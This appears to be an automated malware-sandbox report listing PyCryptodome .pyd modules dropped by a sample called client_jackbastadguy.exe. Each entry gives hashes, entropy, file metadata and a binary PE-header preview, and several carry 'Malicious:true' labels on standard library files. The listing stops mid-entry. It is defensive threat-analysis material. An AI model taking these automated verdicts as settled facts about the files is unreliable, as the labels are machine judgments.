                                                                                                                                                                                                                                                  SHA-256:40B1A6F1318C565E985AFFB8DF304991E908AB1C36C8E960E7AC177E3002FCA0
                                                                                                                                                                                                                                                  SHA-512:886780D6CE3F2955C8FAC38F75DC3A2E017F68ED8FCC75BAA6D74A5E4018CFBF2B99F59D0DBFA5D2728EB1AD7F3F8FE54F0AD3F29D74AFC43E2CDC1A21F889C4
                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......F................{........................'....................................................Rich............PE..d...^."`.........." .....(..........T.....................................................`..........................................X.......Y..d............p..................0....Q...............................R..8............@...............................text....'.......(.................. ..`.rdata.......@.......,..............@..@.data...H....`.......J..............@....pdata.......p.......L..............@..@.rsrc................P..............@..@.reloc..0............R..............@..B........................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\_MEI32282\Cryptodome\Cipher\_raw_ocb.pyd

                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exe
                                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):17920
                                                                                                                                                                                                                                                  Entropy (8bit):5.285518610964193
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:384:txQrFBe/i+/puqeXOv3oTezczeO9p9iYDWYLJzUn:Q5B8txuqeXOfoTezcSO9pUY1JY
                                                                                                                                                                                                                                                  MD5:194D1F38FAB24A3847A0B22A120D635B
                                                                                                                                                                                                                                                  SHA1:A96A9DF4794CDA21E845AAFE2D5ACD5A40A9C865
                                                                                                                                                                                                                                                  SHA-256:FCC68F211C6D2604E8F93E28A3065F6E40F1E044C34D33CC8349EB3873559A0C
                                                                                                                                                                                                                                                  SHA-512:07324B03B7DD804090B00BC62C41162FD1788AE3C8450BCA25D63BF254009D04A7ACDF7ACFAF473A3D1BE1FA58B0007FA35D8E486F90C9B48384C035C83B0CCF
                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......F.f.......................................$....................................................Rich....................PE..d...a."`.........." .....(... ......T.....................................................`.........................................@I......<J..d....p.......`..................$....A...............................A..8............@...............................text....'.......(.................. ..`.rdata.......@.......,..............@..@.data........P.......<..............@....pdata.......`.......>..............@..@.rsrc........p.......B..............@..@.reloc..$............D..............@..B................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\_MEI32282\Cryptodome\Cipher\_raw_ofb.pyd

                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exe
                                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):12288
                                                                                                                                                                                                                                                  Entropy (8bit):4.696064367032408
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:192:V05p7mr3Tutd9PUv22NeLfPI5k3bo7tDLUan:tD6t/N4a3bEZUan
                                                                                                                                                                                                                                                  MD5:0628DC6D83F4A9DDDB0552BD0CC9B54C
                                                                                                                                                                                                                                                  SHA1:C73F990B84A126A05F1D32D509B6361DCA80BC93
                                                                                                                                                                                                                                                  SHA-256:F136B963B5CEB60B0F58127A925D68F04C1C8A946970E10C4ABC3C45A1942BC7
                                                                                                                                                                                                                                                  SHA-512:78D005A2FEC5D1C67FC2B64936161026F9A0B1756862BAF51EAF14EDEE7739F915D059814C8D6F66797F84A28071C46B567F3392DAF4FF7FCDFA94220C965C1A
                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......F................{........................'....................................................Rich............PE..d...`."`.........." ................T.....................................................`..........................................7.......8..d....`.......P..X............p..$....1...............................1..8............0...............................text............................... ..`.rdata.......0......................@..@.data...H....@.......&..............@....pdata..X....P.......(..............@..@.rsrc........`.......,..............@..@.reloc..$....p......................@..B........................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\_MEI32282\Cryptodome\Hash\_BLAKE2b.pyd

                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exe
                                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):14336
                                                                                                                                                                                                                                                  Entropy (8bit):5.219784380683583
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:192:305p7mr3Tutd9Pwv2e42bF7i+V2rQnjt1wmg9jN+mp23XDLUk:rD6tTephi+AojO9jbQHUk
                                                                                                                                                                                                                                                  MD5:59F65C1AD53526840893980B52CD0497
                                                                                                                                                                                                                                                  SHA1:E675A09577C75D877CB1305E60EB3D03A4051B73
                                                                                                                                                                                                                                                  SHA-256:2DF02E84CFD77E91D73B3551BDDA868277F8AE38B262FA44528E87208D0B50FC
                                                                                                                                                                                                                                                  SHA-512:5E9782793A8BB6437D718A36862C13CDE5E7E3780E6F3E82C01F7B2F83EBBDB63F66B3C988FA8DEF36077F17FA1F6C2C77A82FABBD7C17D1568E7CEA19E7EDD6
                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......F................{........................'....................................................Rich............PE..d...[."`.........." ................T.....................................................`..........................................8......|9..d....`.......P..@............p..$....2...............................2..8............0...............................text............................... ..`.rdata.......0....... ..............@..@.data...H....@......................@....pdata..@....P.......0..............@..@.rsrc........`.......4..............@..@.reloc..$....p.......6..............@..B........................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\_MEI32282\Cryptodome\Hash\_BLAKE2s.pyd

                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exe
                                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):13824
                                                                                                                                                                                                                                                  Entropy (8bit):5.171175600505211
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:192:O05p7mr3Tutd9Pwv2aKbxdcgatX1WmkaA09L9kDLUhX:MD6tTZgtX15kanYU
                                                                                                                                                                                                                                                  MD5:4D8230D64493CE217853B4D3B6768674
                                                                                                                                                                                                                                                  SHA1:C845366E7C02A2402BA00B9B6735E1FAD3F2F1EF
                                                                                                                                                                                                                                                  SHA-256:06885DC99A7621BA3BE3B28CB4BCF972549E23ACF62A710F6D6C580AABA1F25A
                                                                                                                                                                                                                                                  SHA-512:C32D5987A0B1DED7211545CB7D3D7482657CA7D74A9083D37A33F65BBE2E7E075CB52EFAEEA00F1840AB8F0BAF7DF1466A4F4E880ABF9650A709814BCEE2F945
                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......F................{........................'....................................................Rich............PE..d...\."`.........." ................T.....................................................`..........................................8.......9..d....`.......P..@............p..$....2...............................2..8............0...............................text............................... ..`.rdata.......0......................@..@.data...H....@.......,..............@....pdata..@....P......................@..@.rsrc........`.......2..............@..@.reloc..$....p.......4..............@..B........................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\_MEI32282\Cryptodome\Hash\_MD2.pyd

                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exe
                                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):13824
                                                                                                                                                                                                                                                  Entropy (8bit):5.171087190344686
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:384:ajJzPAI2p3C2p+EhKnLg9yH8puzoFaPERIQAVqYU:GITp3pp+EhmLg9yH8puzoFaPERIQp
                                                                                                                                                                                                                                                  MD5:4B4831FCFCA23CEBEC872CCCCE8C3CE1
                                                                                                                                                                                                                                                  SHA1:9CA26A95C31E679B0D4CFEDEACEA38334B29B3F3
                                                                                                                                                                                                                                                  SHA-256:75250C7B7EE9F7F944D9C23161D61FE80D59572180A30629C97D1867ECF32093
                                                                                                                                                                                                                                                  SHA-512:7218D67A78EBC76D1AA23AEDDF7B7D209A9E65D4A50FD57F07680953BDF40E42B33D3D6388119B54E3948DA433D0F895BCC0F98E6D1AF4B9821AEFE2300C7EA0
                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......F.f.......................................$....................................................Rich....................PE..d...V."`.........." ................T.....................................................`..........................................9.......9..d....`.......P..(............p..$....2...............................2..8............0...............................text...h........................... ..`.rdata.......0......................@..@.data...x....@.......,..............@....pdata..(....P......................@..@.rsrc........`.......2..............@..@.reloc..$....p.......4..............@..B................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\_MEI32282\Cryptodome\Hash\_MD4.pyd

                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exe
                                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):13824
                                                                                                                                                                                                                                                  Entropy (8bit):5.0894476079532565
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:192:ZE4+jfKIb3gudUPpwVp1sAD7I/9hAkeTOre5QDLU+db:CjJzPQwVp1sAD7KvpUv5uUob
                                                                                                                                                                                                                                                  MD5:642B9CCEA6E2D6F610D209DC3AACF281
                                                                                                                                                                                                                                                  SHA1:8F816AA1D94F085E2FE30A14B4247410910DA8F9
                                                                                                                                                                                                                                                  SHA-256:E5DFB0A60E0E372AE1FF4D0E3F01B22E56408F0F9B04C610ECEF2A5847D6D879
                                                                                                                                                                                                                                                  SHA-512:A728E2F6264A805CE208FEB24600D23EC04C7D17481A39B01F90E47D82CF6C369D6151BB4170D993BE98CEFE8E6BDF2044CF0DC623BAE662C5584812875FC3B8
                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......F.f.......................................$....................................................Rich....................PE..d...V."`.........." ................T.....................................................`..........................................8.......8..d....`.......P..(............p..$....1...............................2..8............0...............................text............................... ..`.rdata.......0......................@..@.data........@.......,..............@....pdata..(....P......................@..@.rsrc........`.......2..............@..@.reloc..$....p.......4..............@..B................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\_MEI32282\Cryptodome\Hash\_MD5.pyd

                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exe
                                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):15360
                                                                                                                                                                                                                                                  Entropy (8bit):5.432796797907171
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:192:N9FZ/KFjb3OuTPU84At56BTBvzcuiDSjeoGIQUPTrLFDLUEPLdN:/wztA8Tt5OwuiDSyoGPmXdUEPB
                                                                                                                                                                                                                                                  MD5:180017650B62058058CB81B53540A9BF
                                                                                                                                                                                                                                                  SHA1:696EECA75621B75BC07E2982EB66D61A1DFECDB6
                                                                                                                                                                                                                                                  SHA-256:8146110D92B2F50B3EB02557BE6EE4586EEC1A2AD7204B48A4F28B8859FE6E29
                                                                                                                                                                                                                                                  SHA-512:9AD447F0B15639C1FA3300E80EC5B175589930CB9166CF108FAFA74093CE791E1FF55CF6686ABF090A8B44BA6B743FEEBA270F378ED405F15418406AB8D01E9B
                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......F.f.......................................$....................................................Rich....................PE..d...W."`.........." ..... ..........T.....................................................`.........................................P8...... 9..d....`.......P..X............p..$....1...............................1..8............0...............................text............ .................. ..`.rdata..p....0.......$..............@..@.data........@.......2..............@....pdata..X....P.......4..............@..@.rsrc........`.......8..............@..@.reloc..$....p.......:..............@..B................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\_MEI32282\Cryptodome\Hash\_RIPEMD160.pyd

                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exe
                                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):13824
                                                                                                                                                                                                                                                  Entropy (8bit):5.099895592918567
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:192:s05p7mr3Tutd9Pgv239k9UgPKsVQJukk7+rDLU8:OD6tD3G9tPKsVQJuUDU
                                                                                                                                                                                                                                                  MD5:11F184E124E91BE3EBDF5EAF92FDE408
                                                                                                                                                                                                                                                  SHA1:5B0440A1A2FBD1B21D5AF7D454098A2B7C404864
                                                                                                                                                                                                                                                  SHA-256:F9220CA8A1948734EC753B1ADA5E655DAF138AF76F01A79C14660B2B144C2FAE
                                                                                                                                                                                                                                                  SHA-512:37B3916A5A4E6D7052DDB72D34347F46077BDF1BA1DCF20928B827B3D2C411C612B4E145DFE70F315EA15E8F7F00946D26E4728F339EDDF08C72B4E493C56BC3
                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......F................{........................'....................................................Rich............PE..d...Z."`.........." ......... ......T.....................................................`.........................................p9......H:..d....`.......P...............p..$...@3..............................`3..8............0...............................text...X........................... ..`.rdata.......0......................@..@.data...H....@.......,..............@....pdata.......P......................@..@.rsrc........`.......2..............@..@.reloc..$....p.......4..............@..B........................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\_MEI32282\Cryptodome\Hash\_SHA1.pyd

                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exe
                                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):17920
                                                                                                                                                                                                                                                  Entropy (8bit):5.65813713656815
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:192:Bj51JwTx7uuj/krY1ZLhGZo2R1J+0eDPSgkNZuOdlptvTLLB5b+vDLUE+Ea:sxQr89hTOJ+0QPSfu6rlZ+/UE+
                                                                                                                                                                                                                                                  MD5:51A01A11848322AC53B07D4D24F97652
                                                                                                                                                                                                                                                  SHA1:141097D0F0F1C5432B1F1A571310BD4266E56A6D
                                                                                                                                                                                                                                                  SHA-256:E549A4FE85759CBFC733ECF190478514B46ECA34EDA2370F523328F6DC976F30
                                                                                                                                                                                                                                                  SHA-512:23281BE77496AF3A6507B610191AF5AA005C974F27129073FD70D51E82A5D3E55FB8C7FF28CF1886B55E264B736AB506EE0D97210E764EB1618C74DE2B44E64A
                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......F.f.......................................$....................................................Rich....................PE..d...W."`.........." .....*..........T.....................................................`.........................................PH......(I..d....p.......`..X...............$....A...............................A..8............@...............................text....).......*.................. ..`.rdata..x....@......................@..@.data........P.......<..............@....pdata..X....`.......>..............@..@.rsrc........p.......B..............@..@.reloc..$............D..............@..B................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\_MEI32282\Cryptodome\Hash\_SHA224.pyd

                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exe
                                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):21504
                                                                                                                                                                                                                                                  Entropy (8bit):5.882538742896355
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:384:lRlEGHXgKXqHGcvYHp5RYcARQOj4MSTjqgPmEO2vUk:NdHXgP/YtswvdUk
                                                                                                                                                                                                                                                  MD5:B20D629142A1354BA94033CAC15D7D8C
                                                                                                                                                                                                                                                  SHA1:CD600F33D5BC5FA3E70BDF346A8D0FB935166468
                                                                                                                                                                                                                                                  SHA-256:147CE6747635B374570D3A1D9FCAB5B195F67E99E34C0F59018A3686A07A3917
                                                                                                                                                                                                                                                  SHA-512:72EFD1C653732FB620787B26D0CA44086405A070EC3CD4BBA5445854C5D7DDE6D669060845D093A1FC2593ED6E48630344FA6F0AF685186FB554D8BB9BC97AA0
                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......F.f.......................................$....................................................Rich....................PE..d...Y."`.........." .....6... ......T.....................................................`..........................................Z.......Z..d............p..................$....R...............................R..8............P...............................text....5.......6.................. ..`.rdata..8....P.......:..............@..@.data...(....`.......J..............@....pdata.......p.......L..............@..@.rsrc................P..............@..@.reloc..$............R..............@..B................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\_MEI32282\Cryptodome\Hash\_SHA256.pyd

                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exe
                                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):21504
                                                                                                                                                                                                                                                  Entropy (8bit):5.88515673373227
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:384:ARlEGHXiKXqHGcvYHp5RYcARQOj4MSTjqgPmEm9Uk:SdHXiP/YtswvdVk
                                                                                                                                                                                                                                                  MD5:6FF2518A93F7279E8FDAC0CE8DE4BF3F
                                                                                                                                                                                                                                                  SHA1:77F4713D4F287E2950C06A0EF2F8C7C8D53BABDD
                                                                                                                                                                                                                                                  SHA-256:27B4DB005685D8E31E37BD632767D5FFC81818D24B622E3D25B8F08F43E29B57
                                                                                                                                                                                                                                                  SHA-512:26A8448D34F70AF62D702851B8353708FB3A1B984CBDC1D2EABE582CAAD8D56B0A835A4C914EB7824DADCF62E83B84D3A669C06ACAF0E1001EB66F85BC5D0377
                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......F.f.......................................$....................................................Rich....................PE..d...X."`.........." .....6... ......T.....................................................`..........................................Z.......Z..d............p..................$....R...............................R..8............P...............................text....5.......6.................. ..`.rdata..8....P.......:..............@..@.data...(....`.......J..............@....pdata.......p.......L..............@..@.rsrc................P..............@..@.reloc..$............R..............@..B................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\_MEI32282\Cryptodome\Hash\_SHA384.pyd

                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exe
                                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):26624
                                                                                                                                                                                                                                                  Entropy (8bit):5.843159039658928
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:768:2HJh9k54Stui0gel9soFdkO66MlPGXmXcCkyk:2H6Ju/FZ6nPxM6k
                                                                                                                                                                                                                                                  MD5:8B59C61BB3A3ADFBB7B8C39F11B8084B
                                                                                                                                                                                                                                                  SHA1:49595C3F830422FEF88D8FBAF003F32EF25501CE
                                                                                                                                                                                                                                                  SHA-256:FBD9CDD873EAFAD3C03C05FFEB0D67F779C2D191389351FE2D835E7D8ECA534F
                                                                                                                                                                                                                                                  SHA-512:6FEDCC8631723B63D3D8CAD6D57953EB356C53814FD6F1ECA6299E2A5272F67C58090D339B5E6BB1DA15F7BEB451FCC9A41129AB7F578155A17BBE0C1D385AA6
                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......F.f.......................................$....................................................Rich....................PE..d...Y."`.........." .....H..."......T.....................................................`..........................................k......hl..d...............................$...pd...............................d..8............`...............................text....F.......H.................. ..`.rdata.......`.......L..............@..@.data...(............^..............@....pdata...............`..............@..@.rsrc................d..............@..@.reloc..$............f..............@..B................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\_MEI32282\Cryptodome\Hash\_SHA512.pyd

                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exe
                                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):26624
                                                                                                                                                                                                                                                  Entropy (8bit):5.896939915107
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:768:VxpB9/i4z5tui0gel9soFdkO66MlPGXmXcPtOJkw:Vx11u/FZ6nPxM8k
                                                                                                                                                                                                                                                  MD5:6A84B1C402DB7FE29E991FCA86C3CECF
                                                                                                                                                                                                                                                  SHA1:FC62477E770F4267C58853C92584969B2F0FEBE2
                                                                                                                                                                                                                                                  SHA-256:CF8FD7B6BBC38FE3570B2C610E9C946CD56BE5D193387B9146F09D9B5745F4BC
                                                                                                                                                                                                                                                  SHA-512:B9D1195429E674778A90262E0A438B72224B113B7222535DAA361222DEE049C9929481D6E1138117655EAE9B2735D51638209A6EF07963F5249AD74F0BFD75C6
                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......F.f.......................................$....................................................Rich....................PE..d...Z."`.........." .....H..."......T.....................................................`..........................................l.......l..d...............................$....d...............................e..8............`...............................text...xG.......H.................. ..`.rdata..H....`.......L..............@..@.data...(............^..............@....pdata...............`..............@..@.rsrc................d..............@..@.reloc..$............f..............@..B................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\_MEI32282\Cryptodome\Hash\_ghash_clmul.pyd

                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exe
                                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):12800
                                                                                                                                                                                                                                                  Entropy (8bit):4.957384431518367
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:192:PUBpDmr37utd9PHv2O3sER2fi2s4DLUgdLl:zDit6O3sa4XUO
                                                                                                                                                                                                                                                  MD5:1D49E6E34FE84C972484B6293CC2F297
                                                                                                                                                                                                                                                  SHA1:3A799DB7102912DA344112712FD2236A099C7F5E
                                                                                                                                                                                                                                                  SHA-256:B2FD9F57815B3F7FFC3365D02510B88DBE74AB1EFF8BE9099DC902412057244D
                                                                                                                                                                                                                                                  SHA-512:CAD8FCC78006D643590C3D784C2DF051B8C448DE457B41507F031C9D7891036AD3F8E00B695D92F5138C250B2426A57C16F7293237054A245FF08B26AD86CF25
                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..............................@......................@.......@.......@.......f.......f.......f.......f.......Rich............................PE..d...\."`.........." ................T.....................................................`..........................................8.......8..d....`.......P...............p..$....1...............................1..8............0...............................text............................... ..`.rdata.......0......................@..@.data...H....@.......(..............@....pdata.......P.......*..............@..@.rsrc........`......................@..@.reloc..$....p.......0..............@..B........................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\_MEI32282\Cryptodome\Hash\_ghash_portable.pyd

                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exe
                                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):13312
                                                                                                                                                                                                                                                  Entropy (8bit):5.014628606839607
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:192:lUBpDmr37utd9PVv27c0qKzLF4DHxXUcDLU/:9DitwzvV4DREiU/
                                                                                                                                                                                                                                                  MD5:CDD1A63E9F508D01EEBEE7646A278805
                                                                                                                                                                                                                                                  SHA1:3CB34B17B63F2F61C2FA1B1338D0B94CF9EE67AF
                                                                                                                                                                                                                                                  SHA-256:AB96945D26FEF23EF4B12E1BD5B1841CFECB8B06AB490B436E3F1A977A7F5E8B
                                                                                                                                                                                                                                                  SHA-512:5F136D8EBFE6AC43846C4820FF8A3C81D991FCACC219C23DDD0674E75B930A1A948D02925BCC7BD807F5A68F01F65B35037B8A193143EB552D224E1DD906C158
                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......F................K........................&.......................................'............Rich....................PE..d...\."`.........." ................T.....................................................`..........................................7.......8..d....`.......P..X............p..$....1...............................1..8............0...............................text............................... ..`.rdata.......0......................@..@.data...H....@.......*..............@....pdata..X....P.......,..............@..@.rsrc........`.......0..............@..@.reloc..$....p.......2..............@..B................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\_MEI32282\Cryptodome\Hash\_keccak.pyd

                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exe
                                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                  Category:dropped
